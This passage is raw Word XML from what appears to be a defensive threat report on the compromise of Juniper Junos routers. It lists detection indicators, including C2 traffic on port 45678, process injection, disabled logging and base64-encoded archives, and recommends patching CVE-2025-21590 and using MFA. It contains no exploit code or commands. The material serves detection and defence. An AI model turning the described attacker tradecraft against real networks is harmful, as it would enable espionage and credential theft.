          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The incident showed how advanced threat actors increasingly target routers and network appliances because they:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFD2103" w14:textId="77777777" w:rsidR="00C94863" w:rsidRPr="003168F2" w:rsidRDefault="00C94863" w:rsidP="00C94863">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Handle large volumes of sensitive traffic </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE85026" w14:textId="77777777" w:rsidR="00C94863" w:rsidRPr="003168F2" w:rsidRDefault="00C94863" w:rsidP="00C94863">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Often lack strong endpoint monitoring </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A579666" w14:textId="77777777" w:rsidR="00C94863" w:rsidRPr="003168F2" w:rsidRDefault="00C94863" w:rsidP="00C94863">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Provide long-term, stealthy network access </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D31A3AA" w14:textId="77777777" w:rsidR="00C94863" w:rsidRPr="003168F2" w:rsidRDefault="00C94863" w:rsidP="00C94863">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Compromised routers can enable espionage, credential theft, and lateral movement across entire enterprise or telecom networks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302C83AC" w14:textId="24609E15" w:rsidR="00C94863" w:rsidRPr="003168F2" w:rsidRDefault="00C94863">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="432B09C4" w14:textId="77777777" w:rsidR="00C94863" w:rsidRPr="003168F2" w:rsidRDefault="00C94863">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="69360A91" w14:textId="3AD61D33" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00B42FCF" w:rsidP="00B42FCF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251670528" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="46E92E26" wp14:editId="234B3269">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1838325</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-48260</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3048000" cy="428625"/>
                <wp:effectExtent l="19050" t="19050" r="19050" b="28575"/>
                <wp:wrapNone/>
                <wp:docPr id="132008250" name="Rectangle: Rounded Corners 6"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3048000" cy="428625"/>
                        </a:xfrm>
                        <a:prstGeom prst="roundRect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="285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B4EA7B8" id="Rectangle: Rounded Corners 6" o:spid="_x0000_s1026" style="position:absolute;margin-left:144.75pt;margin-top:-3.8pt;width:240pt;height:33.75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" filled="f" strokecolor="#030e13 [484]" strokeweight="2.25pt">
                <v:stroke joinstyle="miter"/>
              </v:roundrect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00700371" w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Detection Opportunities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594049D8" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="00700371">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Network-Level Indicators</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125DD643" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="00700371">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Monitor for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F1864E" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Unexpected outbound TCP/UDP sessions </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BA407E" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Traffic on non-standard ports such as 45678 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7448F9A9" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Encrypted router-originated C2 traffic </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9ECB12" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Unusual proxy behavior </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE142FD" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="00700371">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Host-Level Indicators</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D3A866" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="00700371">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Look for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF00548" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Unknown Junos binaries </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250765C9" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Unauthorized process injection </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D8A690" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Disabled logging mechanisms </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7AB449" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Changes to snmpd or mgd daemons </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2763236C" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="00700371">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Behavioral Indicators</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2152A3FA" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="00700371">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Detect:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A697B11" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Excessive CLI activity </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA345CB" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Hidden or obfuscated files </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B95816" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Base64-encoded archives </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E750794" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Suspicious packet-capture behavior </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB08C77" w14:textId="13D671E4" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="00700371">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3782E84C" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="52097796" w14:textId="16D99C78" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00B42FCF" w:rsidP="00B42FCF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251672576" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="35547585" wp14:editId="18AA57A9">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1689734</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-43815</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3381375" cy="428625"/>
                <wp:effectExtent l="19050" t="19050" r="28575" b="28575"/>
                <wp:wrapNone/>
                <wp:docPr id="2014296230" name="Rectangle: Rounded Corners 6"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3381375" cy="428625"/>
                        </a:xfrm>
                        <a:prstGeom prst="roundRect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="285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C5E85D2" id="Rectangle: Rounded Corners 6" o:spid="_x0000_s1026" style="position:absolute;margin-left:133.05pt;margin-top:-3.45pt;width:266.25pt;height:33.7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" filled="f" strokecolor="#030e13 [484]" strokeweight="2.25pt">
                <v:stroke joinstyle="miter"/>
              </v:roundrect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00700371" w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Defensive Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503DA4D6" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="00B42FCF">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1. Patch and Harden Edge Devices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E97C6F" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="00B42FCF">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Immediately patch:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03578E3D" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Juniper Junos OS vulnerabilities </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F85A74" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2025-21590 and related flaws </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B2F8FE" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="00B42FCF">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>2. Enforce Strong Credential Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070714D9" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Use MFA for network administrators </w:t>
      </w:r>
    </w:p>
